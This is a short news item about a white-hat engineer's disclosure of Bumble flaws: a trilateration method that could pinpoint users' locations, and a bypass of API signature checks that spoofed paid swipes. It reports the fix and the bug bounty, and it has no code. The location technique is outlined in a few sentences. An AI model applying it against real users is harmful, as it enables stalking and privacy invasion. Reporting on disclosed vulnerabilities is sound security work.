A software engineer uncovers a vulnerability in the popular dating app, due to which hackers could get the exact locations of users.
Robert Heaton, a software engineer, took the role of a white hat hacker and prevented a data leak.
After he noticed a potential flaw, he executed a ‘trilateration’ attack. An automated script sent a sequence of requests to Bumble’s servers. They relocated the ‘attacker’ before requesting the distance to the victim.
A cybercriminal could find when a users’ distance changes from 3 to 4 miles. Consequently, they would have three exact distances and be able to draw precise triangulation of the victim’s whereabouts.
Heaton also managed to hack another Bumble function. He spoofed the Swipe Yes requests, without paying the necessary fee.
He did so by bypassing the signature checks for API requests.
Bumble Fixes the Bug
Heaton shared his findings with the company. Within 72 hours, they took care of the vulnerability. In addition, he was rewarded $2,000 for his discovery.
Dating apps are rising in popularity, especially since the COVID-19 crisis. Although they’re fun, users are advised to install a VPN on their phone and always run a background check on potential dates.